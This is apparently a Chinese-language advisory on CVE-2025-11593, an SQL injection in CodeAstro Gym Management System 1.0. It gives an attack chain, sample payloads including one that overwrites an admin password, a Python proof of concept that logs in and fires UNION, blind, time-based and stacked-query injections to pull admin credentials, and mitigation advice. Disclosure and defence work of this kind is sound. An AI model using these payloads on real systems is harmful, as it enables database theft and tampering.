CVE-2025-11593：CodeAstro健身房管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11593

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Gym Management System

漏洞概述

CVE-2025-11593是CodeAstro Gym Management System 1.0版本中存在的一个SQL注入漏洞。该漏洞位于/admin/actions/delete-equipment.php文件中，具体涉及对参数ID的操作未进行充分的输入验证和过滤，导致攻击者可以通过构造恶意SQL语句实施注入攻击。

CodeAstro Gym Management System是一款用于健身房日常运营管理的Web应用程序，包含会员管理、设备管理、课程安排等功能。由于该系统涉及用户敏感信息和业务数据，一旦遭受SQL注入攻击，可能导致数据库中的敏感信息泄露、数据被篡改或删除，甚至可能通过数据库提权进一步控制服务器。

该漏洞的CVSS 3.1评分为6.3分，属于中危级别。攻击者可以通过网络远程发起攻击，无需用户交互，但需要低权限认证（如普通管理员账户）即可利用。漏洞的机密性、完整性和可用性影响均为低级别。漏洞细节及利用方式已经公开披露，存在被恶意利用的风险。

该漏洞由[email protected]报告并已在公开渠道披露利用代码，建议使用该系统的组织尽快采取修复措施，防止遭受潜在的安全威胁。

技术细节

该SQL注入漏洞存在于CodeAstro Gym Management System 1.0的/admin/actions/delete-equipment.php文件中。漏洞的根本原因是在处理删除设备请求时，程序直接将用户通过HTTP请求传递的ID参数拼接到SQL查询语句中，而没有使用参数化查询或对输入进行充分的过滤和转义。

具体技术分析如下：

1. **漏洞位置**：/admin/actions/delete-equipment.php文件中的ID参数处理逻辑

2. **漏洞原理**：当管理员执行删除设备操作时，系统会接收用户提交的设备ID参数（如通过GET或POST请求），并将该参数直接拼接到类似`DELETE FROM equipment WHERE id = $id`的SQL语句中。由于缺乏对ID参数的输入验证，攻击者可以构造包含SQL元字符的恶意输入（如单引号、UNION SELECT等），改变原始SQL语句的语义。

3. **利用方式**：攻击者首先需要获取低权限的管理员账户凭证，然后构造包含恶意SQL片段的请求，例如将ID参数设置为`1' OR '1'='1`或`1; UPDATE users SET password='hacked' WHERE id=1; --`等。由于攻击向量为网络（AV:N），认证要求为低权限（PR:L），无需用户交互（UI:N），攻击者可以在远程完成整个攻击过程。

4. **潜在危害**：通过该SQL注入漏洞，攻击者可以实现以下攻击：
- 绕过正常的删除逻辑，删除任意设备记录
- 利用UNION查询读取数据库中的敏感信息（如管理员密码哈希、用户个人信息等）
- 通过堆叠查询执行任意SQL命令（如修改数据、插入恶意记录）
- 在某些数据库配置下，利用SQL注入实现远程代码执行

5. **漏洞验证**：该漏洞的利用代码已在公开渠道发布，攻击者可以方便地复现和利用此漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为CodeAstro Gym Management System 1.0，通过目录扫描、源代码审查或利用已公开的漏洞信息确定/admin/actions/delete-equipment.php文件存在SQL注入漏洞。

STEP 2

步骤2：获取低权限凭证

由于漏洞利用需要低权限认证（PR:L），攻击者通过暴力破解、社会工程学或购买泄露凭证等方式获取管理员账户的用户名和密码。

STEP 3

步骤3：登录管理后台

使用获取的管理员凭证登录系统管理后台，建立有效的会话认证（Session/Cookie）。

STEP 4

步骤4：构造SQL注入Payload

针对/admin/actions/delete-equipment.php文件的ID参数，构造包含恶意SQL片段的Payload，如使用UNION查询、布尔盲注、时间盲注或堆叠查询等技术。

STEP 5

步骤5：发送恶意请求

通过认证的会话，将构造好的恶意请求发送到目标服务器，利用网络远程发起攻击（AV:N），无需用户交互（UI:N）。

STEP 6

步骤6：数据提取或篡改

根据注入类型，成功提取数据库中的敏感信息（如管理员密码哈希、用户数据）或篡改/删除数据库中的记录，实现对机密性、完整性和可用性的低级别影响。

STEP 7

步骤7：后续渗透

利用获取的敏感信息或数据库权限，进一步渗透系统，可能包括提权、横向移动或植入后门等高级攻击行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11593 - CodeAstro Gym Management System SQL Injection PoC
# Vulnerability: SQL Injection in /admin/actions/delete-equipment.php via ID parameter
# Author: Security Researcher

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
ADMIN_LOGIN_URL = f"{TARGET_URL}/admin/"
DELETE_EQUIPMENT_URL = f"{TARGET_URL}/admin/actions/delete-equipment.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin (low privilege required)
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(ADMIN_LOGIN_URL, data=login_data)

# Step 2: Exploit SQL Injection via ID parameter
# Example 1: Boolean-based blind SQL injection to extract data
sqli_payload = "1' OR '1'='1"
params = {
    "ID": sqli_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] Response status: {response.status_code}")
print(f"[+] Response length: {len(response.text)}")

# Example 2: UNION-based SQL injection to extract database information
union_payload = "1' UNION SELECT 1,2,3,4,5-- -"
params = {
    "ID": union_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] UNION injection response: {response.text[:500]}")

# Example 3: Time-based blind SQL injection
time_payload = "1' AND SLEEP(5)-- -"
params = {
    "ID": time_payload
}
import time
start_time = time.time()
response = session.get(DELETE_EQUIPMENT_URL, params=params)
elapsed_time = time.time() - start_time
print(f"[+] Time-based injection elapsed: {elapsed_time:.2f} seconds")

# Example 4: Stacked queries - extract admin credentials
stacked_payload = "1'; SELECT username, password FROM admins-- -"
params = {
    "ID": stacked_payload
}
response = session.get(DELETE_EQUIPMENT_URL, params=params)
print(f"[+] Stacked queries response: {response.text[:500]}")

影响范围

CodeAstro Gym Management System 1.0

防御指南

临时缓解措施

在等待官方修复版本发布之前，建议采取以下临时缓解措施：1）对/admin/actions/delete-equipment.php文件进行代码审查，使用参数化查询重写SQL语句；2）通过WAF规则过滤常见的SQL注入Payload；3）限制/admin目录的访问IP，仅允许可信IP访问管理后台；4）加强管理员账户的密码策略，启用双因素认证；5）监控数据库日志，及时发现异常查询行为；6）定期备份数据库，以便在遭受攻击时快速恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11593
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11593
3 Details https://www.cvedetails.com/cve/CVE-2025-11593/
4 VulDB https://vuldb.com/cve/CVE-2025-11593
5 Link https://codeastro.com/
6 Link https://github.com/coppeliaz/cve/issues/6
7 Link https://vuldb.com/?ctiid.327914
8 Link https://vuldb.com/?id.327914
9 Link https://vuldb.com/?submit.671741
10 Link https://github.com/coppeliaz/cve/issues/6